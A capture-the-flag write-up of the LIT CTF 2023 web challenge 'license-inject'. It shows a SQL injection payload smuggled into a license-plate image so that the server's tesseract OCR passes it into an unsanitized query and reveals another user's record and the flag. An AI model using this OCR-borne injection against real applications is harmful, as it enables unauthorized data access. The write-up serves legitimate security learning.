LIT CTF 2023 - license-inject

Description

Category: Web

i did a thing

player.zip

Resolution

1. Overview

First thing we did was to find in which source file the flag was:

$ grep -rna 'LITCTF'
src/routes/api/+server.ts:137:							fine: 'LITCTF{redacted}'

To summarize:

• The webapp stores cars plate along with a name and a fine in a SQL database:

  CREATE TABLE IF NOT EXISTS plates (name TEXT, plate string, fine TEXT, PRIMARY KEY (name))
  

• The flag is the fine of someone called codetiger:

  plates.push({
  name: 'codetiger',
  // very long random string
  plate: Array(40)
    .fill('')
    .map(() => 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'[Math.floor(Math.random() * 36)])
    .join(''),
  fine: 'LITCTF{redacted}'
  });
  

• We can upload picture of a plate to access to all the information about this plate.
• The server uses tesseract to recognize text in the picture.

2. SQL Injection

There is an input used for SQL query which is not sanitized: text.

SELECT * FROM plates WHERE plate = "${text}"

text is the recognized text using tesseract.

We need to perform SQL injection though plate picture.

Here is the injection: LOL" OR name = "codetiger and the query becomes:

SELECT * FROM plates WHERE plate = "LOL" OR name = "codetiger"

We generate the picture using any drawing software:

We upload it and we get all information about codetiger:

{"name":"codetiger","plate":"WDS9XEH7SLYV7G72E0U902ID81XN2Q9SUBWUYK6H","fine":"LITCTF{cant_escape_codetiger}"}

and the flag: LITCTF{cant_escape_codetiger}.